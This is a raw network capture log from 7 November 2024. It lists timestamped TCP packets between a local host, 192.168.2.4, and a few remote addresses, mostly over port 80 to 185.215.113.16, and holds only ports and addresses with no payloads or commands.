Nov 7, 2024 07:33:26.014908075 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.014935970 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.014996052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015007019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015017033 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015038967 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.015053034 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.015197039 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015208960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015218019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015228987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015239954 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015244961 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.015249968 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015264034 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.015264988 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015275002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015278101 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.015285969 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015292883 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.015295982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015305996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015311003 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.015321970 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015333891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015335083 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.015343904 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.015345097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015356064 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015367031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015371084 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.015377045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015386105 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.015388966 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.015417099 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.015434980 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016005993 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016016960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016026974 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016050100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016057968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016063929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016073942 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016078949 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016088963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016099930 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016100883 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016110897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016114950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016123056 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016133070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016136885 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016144037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016155005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016165972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016175985 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016176939 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016185045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016195059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016202927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016206026 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016220093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016221046 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016228914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016233921 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016239882 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016249895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016258955 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016262054 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016272068 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016273022 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016283035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.016297102 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016313076 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.016330004 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.047554970 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.047579050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.047589064 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.047645092 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.047666073 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.047826052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.047873974 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.047885895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.047918081 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.047930956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048015118 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048026085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048036098 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048048019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048074007 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048085928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048230886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048248053 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048259020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048270941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048281908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048289061 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048297882 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048320055 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048474073 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048511028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048522949 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048527956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048540115 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048557997 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048589945 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048600912 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048610926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048624992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048639059 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048656940 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048671961 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048731089 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048741102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048752069 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048778057 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048789024 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048858881 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048870087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048881054 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048897028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.048906088 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048923969 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.048934937 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.068813086 CET	443	49902	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.089138985 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.089185953 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.089198112 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.089255095 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.109024048 CET	443	49900	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.109103918 CET	443	49900	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.109179974 CET	49900	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.109479904 CET	49902	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.109488010 CET	443	49902	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.110359907 CET	49902	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.110364914 CET	443	49902	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.111164093 CET	443	49901	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.111217976 CET	443	49901	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.111270905 CET	443	49901	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.111275911 CET	49901	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.111316919 CET	49901	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.111485004 CET	49901	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.111502886 CET	443	49901	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.111514091 CET	49901	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.111520052 CET	443	49901	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.121412039 CET	49905	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.121436119 CET	443	49905	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.121514082 CET	49905	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.122034073 CET	49905	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:26.122044086 CET	443	49905	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:26.130924940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.130950928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.130963087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.130980968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131006002 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131063938 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131074905 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131103992 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131128073 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131155968 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131169081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131192923 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131210089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131304026 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131321907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131334066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131345034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131352901 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131356001 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131359100 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131369114 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131392956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131485939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131541014 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131551027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131561995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131584883 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131596088 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131669044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131680965 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131690979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131704092 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131719112 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131730080 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131757021 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131886005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131897926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131907940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131918907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131925106 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131931067 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131942987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131946087 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131954908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.131978989 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.131989002 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.132167101 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132178068 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132186890 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132199049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132211924 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132224083 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.132251024 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.132325888 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132338047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132349014 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132375956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.132390976 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.132477045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132488012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132498980 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132508039 CET	49899	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:26.132512093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132520914 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.132524014 CET	443	49899	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:26.132524967 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132550001 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.132581949 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.132765055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132776022 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132786036 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132797956 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132808924 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132808924 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.132819891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132833004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132837057 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.132843018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132843971 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.132853985 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.132917881 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133044004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133054972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133071899 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133080006 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133083105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133094072 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133106947 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133133888 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133305073 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133316994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133327961 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133357048 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133368969 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133465052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133476973 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133486986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133497000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133512020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133522987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133523941 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133533955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133544922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133550882 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133565903 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133579016 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133749962 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133825064 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133847952 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133862019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133872032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133883953 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133894920 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133907080 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.133928061 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133949041 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.133997917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134047985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134053946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134066105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134078026 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134094000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134111881 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134119987 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134119987 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134155035 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134238958 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134249926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134259939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134270906 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134282112 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134285927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134293079 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134305000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134321928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134331942 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134350061 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134524107 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134535074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134543896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134556055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134565115 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134567976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134577990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134588957 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134593010 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134604931 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134623051 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134669065 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134680986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134689093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134701014 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134712934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134715080 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134723902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134737015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134741068 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134751081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134759903 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134762049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134773970 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134778023 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134784937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134795904 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134804010 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134807110 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.134859085 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.134869099 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.135449886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135462046 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135473013 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135483027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135493994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135503054 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.135507107 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135518074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135526896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135529041 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.135536909 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135548115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135556936 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.135557890 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135567904 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.135570049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135580063 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135590076 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:26.135592937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135602951 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135613918 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:26.135617971 CET	49882	80	192.168.2.4	185.215.113.16
